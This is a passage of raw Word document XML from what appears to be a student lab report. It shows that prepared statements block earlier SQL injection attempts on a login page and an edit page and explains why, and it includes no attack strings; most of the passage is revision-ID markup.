    </w:p>
    <w:p w14:paraId="6C4998B8" w14:textId="1413A327" w:rsidR="00412124" w:rsidRDefault="008F5A5D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BA34C94" wp14:editId="07BA6078">
            <wp:extent cx="2487832" cy="2019080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2985" cy="20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48D" w14:textId="04B79877" w:rsidR="008F5A5D" w:rsidRDefault="008F5A5D" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I can login successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1260CEA5" w14:textId="11F62BAE" w:rsidR="008F5A5D" w:rsidRDefault="008F5A5D" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, I will try a </w:t>
      </w:r>
      <w:r w:rsidR="00FC3923">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>same attack in task2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF65A4D" w14:textId="5A92A934" w:rsidR="00FC3923" w:rsidRDefault="002E45E6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1DB341F" wp14:editId="0F4EBC18">
            <wp:extent cx="2130076" cy="133610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8708" cy="13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A7B" w14:textId="1178F062" w:rsidR="002E45E6" w:rsidRDefault="00E43268" w:rsidP="0063161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67AA9433" wp14:editId="0ECB89F8">
            <wp:extent cx="3282744" cy="17548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4120" cy="17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8A8" w14:textId="2458E3FB" w:rsidR="00920FD9" w:rsidRDefault="00920FD9" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It shows that the code we modified is working correctly and it prevents the system from SQL injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012EC976" w14:textId="54BE519E" w:rsidR="00920FD9" w:rsidRDefault="00920FD9" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2F9C45" w14:textId="48580674" w:rsidR="00603B90" w:rsidRDefault="00603B90" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Second, for the edit page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC71C5" w14:textId="65DF69A6" w:rsidR="00603B90" w:rsidRDefault="00603B90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F620F18" wp14:editId="47578534">
            <wp:extent cx="5274310" cy="16510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F612" w14:textId="24645D68" w:rsidR="00096495" w:rsidRDefault="00096495" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Login and redo the task3.1 attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39602464" w14:textId="63434F85" w:rsidR="00096495" w:rsidRDefault="00096495" w:rsidP="0063161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D84C071" wp14:editId="4C960BC6">
            <wp:extent cx="3171817" cy="279605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184" cy="2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A006" w14:textId="1FB08778" w:rsidR="0026051A" w:rsidRDefault="0026051A" w:rsidP="0063161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D398230" wp14:editId="33E6289B">
            <wp:extent cx="2958054" cy="2500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771" cy="25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32B" w14:textId="50886B5B" w:rsidR="00EF08C7" w:rsidRDefault="00EF08C7" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We can see that the Email is changed to all the contains we put in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B5442" w14:textId="282C3C6C" w:rsidR="00EF08C7" w:rsidRDefault="00EF08C7" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4416C9E9" w14:textId="108B897B" w:rsidR="00EF08C7" w:rsidRPr="00F30D14" w:rsidRDefault="00547EF4" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason why this protection make effects is that using prepared statements trusted code is sent via a code channel. Therefore, the database clearly knows the boundary between code and data. When it gets data from </w:t>
      </w:r>
      <w:r w:rsidR="00664CA0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the data channel</w:t>
      </w:r>
      <w:r w:rsidR="005C3680">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, it will not </w:t>
      </w:r>
      <w:r w:rsidR="00743C4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>parse the data.</w:t>
      </w:r>
      <w:r w:rsidR="004A5620">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even though </w:t>
      </w:r>
      <w:r w:rsidR="007863E9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">an attacker can hide </w:t>
      </w:r>
      <w:r w:rsidR="001E6FE4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>code in data, the code will never be treated as code, so it will never be executed.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EF08C7" w:rsidRPr="00F30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EB5"/>
    <w:rsid w:val="00002F89"/>
    <w:rsid w:val="0000455A"/>
    <w:rsid w:val="000057C5"/>
    <w:rsid w:val="000068A4"/>
    <w:rsid w:val="00007244"/>
    <w:rsid w:val="000079C7"/>
    <w:rsid w:val="00007D54"/>
    <w:rsid w:val="0001034A"/>
    <w:rsid w:val="00010472"/>
    <w:rsid w:val="00010996"/>
    <w:rsid w:val="0001193F"/>
    <w:rsid w:val="00011C45"/>
    <w:rsid w:val="00012073"/>
    <w:rsid w:val="00014AD7"/>
    <w:rsid w:val="00016B4F"/>
    <w:rsid w:val="0001778D"/>
    <w:rsid w:val="00020F6E"/>
    <w:rsid w:val="000215B5"/>
    <w:rsid w:val="00024395"/>
    <w:rsid w:val="00026E3C"/>
    <w:rsid w:val="00040D3A"/>
    <w:rsid w:val="00041DCC"/>
    <w:rsid w:val="000428AE"/>
    <w:rsid w:val="00043A25"/>
    <w:rsid w:val="0004404F"/>
    <w:rsid w:val="00044779"/>
    <w:rsid w:val="000464E6"/>
    <w:rsid w:val="0004685A"/>
    <w:rsid w:val="00046CCA"/>
    <w:rsid w:val="00052C7F"/>
    <w:rsid w:val="00054FCC"/>
    <w:rsid w:val="00055358"/>
    <w:rsid w:val="000554BD"/>
    <w:rsid w:val="00055B7A"/>
    <w:rsid w:val="00061C04"/>
    <w:rsid w:val="00062218"/>
    <w:rsid w:val="00062F4D"/>
    <w:rsid w:val="000630F3"/>
    <w:rsid w:val="000647E2"/>
    <w:rsid w:val="00064EDC"/>
    <w:rsid w:val="000701EE"/>
    <w:rsid w:val="0007022E"/>
    <w:rsid w:val="000702A8"/>
    <w:rsid w:val="000716BA"/>
    <w:rsid w:val="00071D18"/>
    <w:rsid w:val="00071FCA"/>
    <w:rsid w:val="00072B3D"/>
    <w:rsid w:val="00073485"/>
    <w:rsid w:val="00073BFF"/>
    <w:rsid w:val="00074002"/>
    <w:rsid w:val="00074743"/>
    <w:rsid w:val="000805AE"/>
    <w:rsid w:val="00081F7C"/>
    <w:rsid w:val="00084329"/>
    <w:rsid w:val="00084665"/>
    <w:rsid w:val="000851FE"/>
    <w:rsid w:val="00085847"/>
    <w:rsid w:val="000875CE"/>
    <w:rsid w:val="000876FD"/>
    <w:rsid w:val="00091C84"/>
    <w:rsid w:val="0009633C"/>
    <w:rsid w:val="00096495"/>
    <w:rsid w:val="000A7330"/>
    <w:rsid w:val="000B0001"/>
    <w:rsid w:val="000B2105"/>
    <w:rsid w:val="000B332E"/>
    <w:rsid w:val="000B3531"/>
    <w:rsid w:val="000B5614"/>
    <w:rsid w:val="000B5844"/>
    <w:rsid w:val="000B5D18"/>
    <w:rsid w:val="000B7217"/>
    <w:rsid w:val="000C3602"/>
    <w:rsid w:val="000C3B1A"/>
    <w:rsid w:val="000C43ED"/>
    <w:rsid w:val="000C5F1B"/>
    <w:rsid w:val="000C74EA"/>
    <w:rsid w:val="000D03E0"/>
    <w:rsid w:val="000D0444"/>
    <w:rsid w:val="000D3239"/>
    <w:rsid w:val="000D324F"/>
    <w:rsid w:val="000D34DE"/>
    <w:rsid w:val="000D5583"/>
    <w:rsid w:val="000D6D19"/>
    <w:rsid w:val="000D780B"/>
    <w:rsid w:val="000D78E9"/>
    <w:rsid w:val="000E143C"/>
    <w:rsid w:val="000E3276"/>
    <w:rsid w:val="000E32A8"/>
    <w:rsid w:val="000E3A31"/>
    <w:rsid w:val="000E5141"/>
    <w:rsid w:val="000F2610"/>
    <w:rsid w:val="000F2B36"/>
    <w:rsid w:val="000F2D8D"/>
    <w:rsid w:val="000F3051"/>
    <w:rsid w:val="000F4C13"/>
    <w:rsid w:val="000F7270"/>
    <w:rsid w:val="00101EA8"/>
    <w:rsid w:val="00105362"/>
    <w:rsid w:val="001065F6"/>
    <w:rsid w:val="00106CD7"/>
    <w:rsid w:val="00111272"/>
    <w:rsid w:val="00111496"/>
    <w:rsid w:val="001157A8"/>
    <w:rsid w:val="00121210"/>
    <w:rsid w:val="00122A34"/>
    <w:rsid w:val="001239C2"/>
    <w:rsid w:val="00123F10"/>
    <w:rsid w:val="00124B3E"/>
    <w:rsid w:val="00124EBB"/>
    <w:rsid w:val="00125617"/>
    <w:rsid w:val="001259C7"/>
    <w:rsid w:val="00125D78"/>
    <w:rsid w:val="00130B55"/>
    <w:rsid w:val="001312E9"/>
    <w:rsid w:val="001317F5"/>
    <w:rsid w:val="0013344F"/>
    <w:rsid w:val="001369CB"/>
    <w:rsid w:val="00140030"/>
    <w:rsid w:val="00141F10"/>
    <w:rsid w:val="00142B48"/>
    <w:rsid w:val="00142DDC"/>
    <w:rsid w:val="00143435"/>
    <w:rsid w:val="0014364B"/>
    <w:rsid w:val="00144D04"/>
    <w:rsid w:val="001455EB"/>
    <w:rsid w:val="00145758"/>
    <w:rsid w:val="0014775C"/>
    <w:rsid w:val="00147A83"/>
    <w:rsid w:val="00147A96"/>
    <w:rsid w:val="00147ED1"/>
    <w:rsid w:val="00150F50"/>
    <w:rsid w:val="00151E13"/>
    <w:rsid w:val="001535C8"/>
    <w:rsid w:val="001536DF"/>
    <w:rsid w:val="0015386C"/>
    <w:rsid w:val="00153F30"/>
    <w:rsid w:val="00154591"/>
    <w:rsid w:val="00154D49"/>
    <w:rsid w:val="00154EB5"/>
    <w:rsid w:val="001556F2"/>
    <w:rsid w:val="00155C4C"/>
    <w:rsid w:val="00155F3A"/>
    <w:rsid w:val="00160A79"/>
    <w:rsid w:val="0016219D"/>
    <w:rsid w:val="00162673"/>
    <w:rsid w:val="00162719"/>
    <w:rsid w:val="00162873"/>
    <w:rsid w:val="00162C47"/>
    <w:rsid w:val="001636A7"/>
    <w:rsid w:val="00163835"/>
    <w:rsid w:val="001641AE"/>
    <w:rsid w:val="00166779"/>
    <w:rsid w:val="00167197"/>
    <w:rsid w:val="00171A6B"/>
    <w:rsid w:val="00171C9F"/>
    <w:rsid w:val="00173E5A"/>
    <w:rsid w:val="001759C2"/>
    <w:rsid w:val="0017734C"/>
    <w:rsid w:val="001773E1"/>
    <w:rsid w:val="00181139"/>
    <w:rsid w:val="00181342"/>
    <w:rsid w:val="00182F1E"/>
    <w:rsid w:val="00185233"/>
    <w:rsid w:val="00187F93"/>
    <w:rsid w:val="001915A3"/>
    <w:rsid w:val="00196394"/>
    <w:rsid w:val="00196DF4"/>
    <w:rsid w:val="0019738A"/>
    <w:rsid w:val="0019772C"/>
    <w:rsid w:val="001A011E"/>
    <w:rsid w:val="001A07D9"/>
    <w:rsid w:val="001A54EF"/>
    <w:rsid w:val="001A5DBA"/>
    <w:rsid w:val="001B1B62"/>
    <w:rsid w:val="001B227F"/>
    <w:rsid w:val="001B2884"/>
    <w:rsid w:val="001B2B09"/>
    <w:rsid w:val="001B2B7C"/>
    <w:rsid w:val="001B4BFA"/>
    <w:rsid w:val="001C3780"/>
    <w:rsid w:val="001C4473"/>
    <w:rsid w:val="001C4E5E"/>
    <w:rsid w:val="001C5282"/>
    <w:rsid w:val="001C6B1A"/>
    <w:rsid w:val="001C6B2A"/>
    <w:rsid w:val="001C743A"/>
    <w:rsid w:val="001D1E9B"/>
    <w:rsid w:val="001D21D9"/>
    <w:rsid w:val="001D4294"/>
    <w:rsid w:val="001D4FE9"/>
    <w:rsid w:val="001D525F"/>
    <w:rsid w:val="001D5EC6"/>
    <w:rsid w:val="001D63DE"/>
    <w:rsid w:val="001D7FCE"/>
    <w:rsid w:val="001E3626"/>
    <w:rsid w:val="001E4226"/>
    <w:rsid w:val="001E44B2"/>
    <w:rsid w:val="001E6FE4"/>
    <w:rsid w:val="001F263B"/>
    <w:rsid w:val="001F457C"/>
    <w:rsid w:val="001F5A17"/>
    <w:rsid w:val="001F710B"/>
    <w:rsid w:val="00200143"/>
    <w:rsid w:val="00201F9D"/>
    <w:rsid w:val="002052D3"/>
    <w:rsid w:val="00210777"/>
    <w:rsid w:val="00215113"/>
    <w:rsid w:val="00215994"/>
    <w:rsid w:val="00216681"/>
    <w:rsid w:val="002205DA"/>
    <w:rsid w:val="0022399B"/>
    <w:rsid w:val="00223CFD"/>
    <w:rsid w:val="00226B13"/>
    <w:rsid w:val="002336BF"/>
    <w:rsid w:val="00234B75"/>
    <w:rsid w:val="002360DA"/>
    <w:rsid w:val="00236D81"/>
    <w:rsid w:val="0023737D"/>
    <w:rsid w:val="00241659"/>
    <w:rsid w:val="00243AC4"/>
    <w:rsid w:val="00243B22"/>
    <w:rsid w:val="002443EC"/>
    <w:rsid w:val="00244D26"/>
    <w:rsid w:val="00245D03"/>
    <w:rsid w:val="0025074D"/>
    <w:rsid w:val="00250E5C"/>
    <w:rsid w:val="0025362B"/>
    <w:rsid w:val="002539F1"/>
    <w:rsid w:val="00253F93"/>
    <w:rsid w:val="0025409F"/>
    <w:rsid w:val="0025427B"/>
    <w:rsid w:val="002545C5"/>
    <w:rsid w:val="00254A17"/>
    <w:rsid w:val="00254D21"/>
    <w:rsid w:val="00255143"/>
    <w:rsid w:val="00256276"/>
    <w:rsid w:val="00257587"/>
    <w:rsid w:val="0026051A"/>
    <w:rsid w:val="002634CA"/>
    <w:rsid w:val="0026385C"/>
    <w:rsid w:val="00265031"/>
    <w:rsid w:val="002654C1"/>
    <w:rsid w:val="00267688"/>
    <w:rsid w:val="00267FD2"/>
    <w:rsid w:val="002703D0"/>
    <w:rsid w:val="00270FAE"/>
    <w:rsid w:val="00271FF3"/>
    <w:rsid w:val="0027260B"/>
    <w:rsid w:val="002775E2"/>
    <w:rsid w:val="00277EA4"/>
    <w:rsid w:val="002807AA"/>
    <w:rsid w:val="00281672"/>
    <w:rsid w:val="00282275"/>
    <w:rsid w:val="0028464A"/>
    <w:rsid w:val="0028763F"/>
    <w:rsid w:val="00287D9E"/>
    <w:rsid w:val="00291006"/>
    <w:rsid w:val="002915F9"/>
    <w:rsid w:val="00291DC9"/>
    <w:rsid w:val="002923BD"/>
    <w:rsid w:val="002945D7"/>
    <w:rsid w:val="00297825"/>
    <w:rsid w:val="00297BD8"/>
    <w:rsid w:val="002A1463"/>
    <w:rsid w:val="002A4992"/>
    <w:rsid w:val="002A58E2"/>
    <w:rsid w:val="002A5DF1"/>
    <w:rsid w:val="002B19A6"/>
    <w:rsid w:val="002B2BCA"/>
    <w:rsid w:val="002B369E"/>
    <w:rsid w:val="002B3711"/>
    <w:rsid w:val="002B37CF"/>
    <w:rsid w:val="002B3899"/>
    <w:rsid w:val="002B4DB9"/>
    <w:rsid w:val="002B7470"/>
    <w:rsid w:val="002B7F71"/>
    <w:rsid w:val="002C151B"/>
    <w:rsid w:val="002C1BBD"/>
    <w:rsid w:val="002C4B56"/>
    <w:rsid w:val="002C4C81"/>
    <w:rsid w:val="002C7AE6"/>
    <w:rsid w:val="002D138A"/>
    <w:rsid w:val="002D4518"/>
    <w:rsid w:val="002D455A"/>
    <w:rsid w:val="002D47C0"/>
    <w:rsid w:val="002D5D35"/>
    <w:rsid w:val="002E11DA"/>
    <w:rsid w:val="002E3BC6"/>
    <w:rsid w:val="002E42B0"/>
    <w:rsid w:val="002E43BE"/>
    <w:rsid w:val="002E45E6"/>
    <w:rsid w:val="002E5D10"/>
    <w:rsid w:val="002E6F20"/>
    <w:rsid w:val="002E785A"/>
    <w:rsid w:val="002E7CA7"/>
    <w:rsid w:val="002F1179"/>
    <w:rsid w:val="002F300F"/>
    <w:rsid w:val="002F398C"/>
    <w:rsid w:val="002F5089"/>
    <w:rsid w:val="00300B8A"/>
    <w:rsid w:val="0030202C"/>
    <w:rsid w:val="003033B2"/>
    <w:rsid w:val="00303686"/>
    <w:rsid w:val="003043DF"/>
    <w:rsid w:val="00305976"/>
    <w:rsid w:val="00310D1C"/>
    <w:rsid w:val="00312B97"/>
    <w:rsid w:val="003157B8"/>
    <w:rsid w:val="00315AF2"/>
    <w:rsid w:val="00315B22"/>
    <w:rsid w:val="00315F36"/>
    <w:rsid w:val="003163E4"/>
    <w:rsid w:val="003165A7"/>
    <w:rsid w:val="00316DBA"/>
    <w:rsid w:val="00316E75"/>
    <w:rsid w:val="00317923"/>
    <w:rsid w:val="00321661"/>
    <w:rsid w:val="00322F87"/>
    <w:rsid w:val="0032463C"/>
    <w:rsid w:val="0033000D"/>
    <w:rsid w:val="003307FA"/>
    <w:rsid w:val="003316AD"/>
    <w:rsid w:val="00331CC5"/>
    <w:rsid w:val="0033206F"/>
    <w:rsid w:val="003321AF"/>
    <w:rsid w:val="003330F9"/>
    <w:rsid w:val="00334625"/>
    <w:rsid w:val="003349D8"/>
    <w:rsid w:val="00336A6D"/>
    <w:rsid w:val="00337175"/>
    <w:rsid w:val="003377A5"/>
    <w:rsid w:val="00337944"/>
    <w:rsid w:val="00345798"/>
    <w:rsid w:val="0035019B"/>
    <w:rsid w:val="0035027A"/>
    <w:rsid w:val="00351964"/>
    <w:rsid w:val="00355BAC"/>
    <w:rsid w:val="003569B1"/>
    <w:rsid w:val="00360A57"/>
    <w:rsid w:val="00361384"/>
    <w:rsid w:val="0036184D"/>
    <w:rsid w:val="00361CAE"/>
    <w:rsid w:val="00367F97"/>
    <w:rsid w:val="00372706"/>
    <w:rsid w:val="00374E99"/>
    <w:rsid w:val="00381C04"/>
    <w:rsid w:val="00382039"/>
    <w:rsid w:val="00385260"/>
    <w:rsid w:val="00385AE5"/>
    <w:rsid w:val="003863B1"/>
    <w:rsid w:val="0039031D"/>
    <w:rsid w:val="00390375"/>
    <w:rsid w:val="00392AF6"/>
    <w:rsid w:val="00394119"/>
    <w:rsid w:val="00394571"/>
    <w:rsid w:val="00396B8F"/>
    <w:rsid w:val="00396E0E"/>
    <w:rsid w:val="0039757C"/>
    <w:rsid w:val="00397771"/>
    <w:rsid w:val="00397FF2"/>
    <w:rsid w:val="003A02B2"/>
    <w:rsid w:val="003A1189"/>
    <w:rsid w:val="003A227F"/>
    <w:rsid w:val="003A2FF1"/>
    <w:rsid w:val="003A43B3"/>
    <w:rsid w:val="003B055A"/>
    <w:rsid w:val="003B150B"/>
    <w:rsid w:val="003C16AC"/>
    <w:rsid w:val="003C4724"/>
    <w:rsid w:val="003C50B8"/>
    <w:rsid w:val="003C53BD"/>
    <w:rsid w:val="003C6D1F"/>
    <w:rsid w:val="003D09A1"/>
    <w:rsid w:val="003D3944"/>
    <w:rsid w:val="003D4BB8"/>
    <w:rsid w:val="003D52F2"/>
    <w:rsid w:val="003D5E71"/>
    <w:rsid w:val="003D6F2B"/>
    <w:rsid w:val="003E0A54"/>
    <w:rsid w:val="003E1065"/>
    <w:rsid w:val="003E13A9"/>
    <w:rsid w:val="003E16A1"/>
    <w:rsid w:val="003E17E3"/>
    <w:rsid w:val="003E1919"/>
    <w:rsid w:val="003E1C78"/>
    <w:rsid w:val="003E32F6"/>
    <w:rsid w:val="003E5773"/>
    <w:rsid w:val="003E6FCD"/>
    <w:rsid w:val="003E7576"/>
    <w:rsid w:val="003F054A"/>
    <w:rsid w:val="003F1F0B"/>
    <w:rsid w:val="003F2843"/>
    <w:rsid w:val="003F3CEC"/>
    <w:rsid w:val="003F4640"/>
    <w:rsid w:val="003F4AC4"/>
    <w:rsid w:val="003F6042"/>
    <w:rsid w:val="003F6736"/>
    <w:rsid w:val="003F7A97"/>
    <w:rsid w:val="00402F10"/>
    <w:rsid w:val="00402F1F"/>
    <w:rsid w:val="0040414E"/>
    <w:rsid w:val="00404188"/>
    <w:rsid w:val="00404FA1"/>
    <w:rsid w:val="00405A36"/>
    <w:rsid w:val="00410176"/>
    <w:rsid w:val="0041088A"/>
    <w:rsid w:val="00412124"/>
    <w:rsid w:val="004121C9"/>
    <w:rsid w:val="00412644"/>
    <w:rsid w:val="0041294A"/>
    <w:rsid w:val="00413B7C"/>
    <w:rsid w:val="00414E97"/>
    <w:rsid w:val="0041724A"/>
    <w:rsid w:val="0042042C"/>
    <w:rsid w:val="00421E21"/>
    <w:rsid w:val="004238EA"/>
    <w:rsid w:val="00424A43"/>
    <w:rsid w:val="004252A2"/>
    <w:rsid w:val="004253A5"/>
    <w:rsid w:val="0042584B"/>
    <w:rsid w:val="004259F6"/>
    <w:rsid w:val="00426917"/>
    <w:rsid w:val="004273E1"/>
    <w:rsid w:val="004322E1"/>
    <w:rsid w:val="004327DD"/>
    <w:rsid w:val="00435DC4"/>
    <w:rsid w:val="004366C6"/>
    <w:rsid w:val="00436E59"/>
    <w:rsid w:val="004376AB"/>
    <w:rsid w:val="00437E21"/>
    <w:rsid w:val="00440E95"/>
    <w:rsid w:val="00442DC0"/>
    <w:rsid w:val="00444A5C"/>
    <w:rsid w:val="004459B5"/>
    <w:rsid w:val="00445C00"/>
    <w:rsid w:val="0044756C"/>
    <w:rsid w:val="00447C88"/>
    <w:rsid w:val="00447F8C"/>
    <w:rsid w:val="0045115E"/>
    <w:rsid w:val="004532D0"/>
    <w:rsid w:val="004557BD"/>
    <w:rsid w:val="004601B9"/>
    <w:rsid w:val="00461439"/>
    <w:rsid w:val="0046193D"/>
    <w:rsid w:val="0046199D"/>
    <w:rsid w:val="00462B66"/>
    <w:rsid w:val="00462F9E"/>
    <w:rsid w:val="00463B24"/>
    <w:rsid w:val="00463EFB"/>
    <w:rsid w:val="004658F3"/>
    <w:rsid w:val="004673FB"/>
    <w:rsid w:val="00467E5A"/>
    <w:rsid w:val="004708B7"/>
    <w:rsid w:val="00470F04"/>
    <w:rsid w:val="004713E2"/>
    <w:rsid w:val="004721FB"/>
    <w:rsid w:val="00474BAE"/>
    <w:rsid w:val="00477698"/>
    <w:rsid w:val="00480371"/>
    <w:rsid w:val="00481205"/>
    <w:rsid w:val="004829CD"/>
    <w:rsid w:val="00482E35"/>
    <w:rsid w:val="0048353B"/>
    <w:rsid w:val="00483F99"/>
    <w:rsid w:val="0048447B"/>
    <w:rsid w:val="00491720"/>
    <w:rsid w:val="004939C5"/>
    <w:rsid w:val="00496773"/>
    <w:rsid w:val="0049785F"/>
    <w:rsid w:val="00497D0E"/>
    <w:rsid w:val="004A1E63"/>
    <w:rsid w:val="004A47D7"/>
    <w:rsid w:val="004A48B5"/>
    <w:rsid w:val="004A5620"/>
    <w:rsid w:val="004A65DF"/>
    <w:rsid w:val="004B07E3"/>
    <w:rsid w:val="004B0CA3"/>
    <w:rsid w:val="004B0D1C"/>
    <w:rsid w:val="004B10F7"/>
    <w:rsid w:val="004B115F"/>
    <w:rsid w:val="004B3F9F"/>
    <w:rsid w:val="004B4CF5"/>
    <w:rsid w:val="004B5EEB"/>
    <w:rsid w:val="004C0C6E"/>
    <w:rsid w:val="004C22B2"/>
    <w:rsid w:val="004C550B"/>
    <w:rsid w:val="004C6E86"/>
    <w:rsid w:val="004C77E8"/>
    <w:rsid w:val="004C7D44"/>
    <w:rsid w:val="004D0270"/>
    <w:rsid w:val="004D0A22"/>
    <w:rsid w:val="004D12F0"/>
    <w:rsid w:val="004D38DF"/>
    <w:rsid w:val="004D460A"/>
    <w:rsid w:val="004D54FA"/>
    <w:rsid w:val="004D59C1"/>
    <w:rsid w:val="004E0732"/>
    <w:rsid w:val="004E1525"/>
    <w:rsid w:val="004E311C"/>
    <w:rsid w:val="004E3329"/>
    <w:rsid w:val="004E577F"/>
    <w:rsid w:val="004E652E"/>
    <w:rsid w:val="004E72B9"/>
    <w:rsid w:val="004E776F"/>
    <w:rsid w:val="004F04F2"/>
    <w:rsid w:val="004F227E"/>
    <w:rsid w:val="004F22AC"/>
    <w:rsid w:val="004F4093"/>
    <w:rsid w:val="004F6B08"/>
    <w:rsid w:val="004F6FC2"/>
    <w:rsid w:val="0050102F"/>
    <w:rsid w:val="00504C21"/>
    <w:rsid w:val="005060F4"/>
    <w:rsid w:val="0051361F"/>
    <w:rsid w:val="00514A6C"/>
    <w:rsid w:val="00514EB5"/>
    <w:rsid w:val="00515936"/>
    <w:rsid w:val="00515D1E"/>
    <w:rsid w:val="0051715F"/>
    <w:rsid w:val="00517B28"/>
    <w:rsid w:val="00521431"/>
    <w:rsid w:val="00521D1F"/>
    <w:rsid w:val="00522F0A"/>
    <w:rsid w:val="005240C2"/>
    <w:rsid w:val="00524DCD"/>
    <w:rsid w:val="00525319"/>
    <w:rsid w:val="00527423"/>
    <w:rsid w:val="00530036"/>
    <w:rsid w:val="00530236"/>
    <w:rsid w:val="005307F0"/>
    <w:rsid w:val="005310F3"/>
    <w:rsid w:val="00531C18"/>
    <w:rsid w:val="00531F4E"/>
    <w:rsid w:val="00541E62"/>
    <w:rsid w:val="00547DD8"/>
    <w:rsid w:val="00547EF4"/>
    <w:rsid w:val="00547F6F"/>
    <w:rsid w:val="00550354"/>
    <w:rsid w:val="00550DD9"/>
    <w:rsid w:val="0055105C"/>
    <w:rsid w:val="005515D7"/>
    <w:rsid w:val="00551803"/>
    <w:rsid w:val="00552AE2"/>
    <w:rsid w:val="00552E3A"/>
    <w:rsid w:val="00553C40"/>
    <w:rsid w:val="00553CDB"/>
    <w:rsid w:val="00555A10"/>
    <w:rsid w:val="00556BAB"/>
    <w:rsid w:val="005607F0"/>
    <w:rsid w:val="00562AB8"/>
    <w:rsid w:val="00571365"/>
    <w:rsid w:val="00572D71"/>
    <w:rsid w:val="00574361"/>
    <w:rsid w:val="005751CC"/>
    <w:rsid w:val="005760C5"/>
    <w:rsid w:val="00576B0C"/>
    <w:rsid w:val="00577B2A"/>
    <w:rsid w:val="00580248"/>
    <w:rsid w:val="0058221C"/>
    <w:rsid w:val="00582C9A"/>
    <w:rsid w:val="00584087"/>
    <w:rsid w:val="0058441A"/>
    <w:rsid w:val="00585E6F"/>
    <w:rsid w:val="00590BA8"/>
    <w:rsid w:val="005925A5"/>
    <w:rsid w:val="005933E4"/>
    <w:rsid w:val="005941D5"/>
    <w:rsid w:val="00595338"/>
    <w:rsid w:val="00596538"/>
    <w:rsid w:val="005A0A48"/>
    <w:rsid w:val="005A1DF9"/>
    <w:rsid w:val="005A3F7E"/>
    <w:rsid w:val="005A5268"/>
    <w:rsid w:val="005A62F2"/>
    <w:rsid w:val="005A6AE9"/>
    <w:rsid w:val="005B4529"/>
    <w:rsid w:val="005B4931"/>
    <w:rsid w:val="005B49D6"/>
    <w:rsid w:val="005B540D"/>
    <w:rsid w:val="005B5E6D"/>
    <w:rsid w:val="005B6790"/>
    <w:rsid w:val="005B7004"/>
    <w:rsid w:val="005C05BA"/>
    <w:rsid w:val="005C2137"/>
    <w:rsid w:val="005C2F6E"/>
    <w:rsid w:val="005C3680"/>
    <w:rsid w:val="005C3BB4"/>
    <w:rsid w:val="005D1CB5"/>
    <w:rsid w:val="005D2363"/>
    <w:rsid w:val="005D23E5"/>
    <w:rsid w:val="005D7338"/>
    <w:rsid w:val="005D7C6B"/>
    <w:rsid w:val="005E0593"/>
    <w:rsid w:val="005E434E"/>
    <w:rsid w:val="005E4A09"/>
    <w:rsid w:val="005E7F08"/>
    <w:rsid w:val="005F2D67"/>
    <w:rsid w:val="005F3BDA"/>
    <w:rsid w:val="00602069"/>
    <w:rsid w:val="00602080"/>
    <w:rsid w:val="006023DE"/>
    <w:rsid w:val="00602C6B"/>
    <w:rsid w:val="00603B90"/>
    <w:rsid w:val="00605144"/>
    <w:rsid w:val="006051D0"/>
    <w:rsid w:val="00605E9D"/>
